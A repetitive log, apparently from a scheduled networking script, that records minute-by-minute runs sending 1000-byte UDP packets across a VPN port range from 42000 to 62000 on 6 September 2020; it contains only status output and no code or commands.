+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:11:05 +Starting port fill at 2020-09-06 06:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:12:05 +Starting port fill at 2020-09-06 06:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:13:06 +Starting port fill at 2020-09-06 06:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:14:07 +Starting port fill at 2020-09-06 06:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:15:04 +Starting port fill at 2020-09-06 06:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:16:06 +Starting port fill at 2020-09-06 06:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:17:05 +Starting port fill at 2020-09-06 06:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:18:07 +Starting port fill at 2020-09-06 06:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:19:07 +Starting port fill at 2020-09-06 06:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:20:05 +Starting port fill at 2020-09-06 06:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:21:04 +Starting port fill at 2020-09-06 06:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:22:04 +Starting port fill at 2020-09-06 06:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:23:04 +Starting port fill at 2020-09-06 06:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:24:04 +Starting port fill at 2020-09-06 06:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:25:06 +Starting port fill at 2020-09-06 06:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:26:05 +Starting port fill at 2020-09-06 06:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:27:04 +Starting port fill at 2020-09-06 06:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:28:06 +Starting port fill at 2020-09-06 06:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:29:05 +Starting port fill at 2020-09-06 06:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:30:04 +Starting port fill at 2020-09-06 06:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:31:05 +Starting port fill at 2020-09-06 06:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:32:07 +Starting port fill at 2020-09-06 06:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:33:05 +Starting port fill at 2020-09-06 06:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:34:04 +Starting port fill at 2020-09-06 06:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:35:06 +Starting port fill at 2020-09-06 06:36:01 +Using tun src ip: 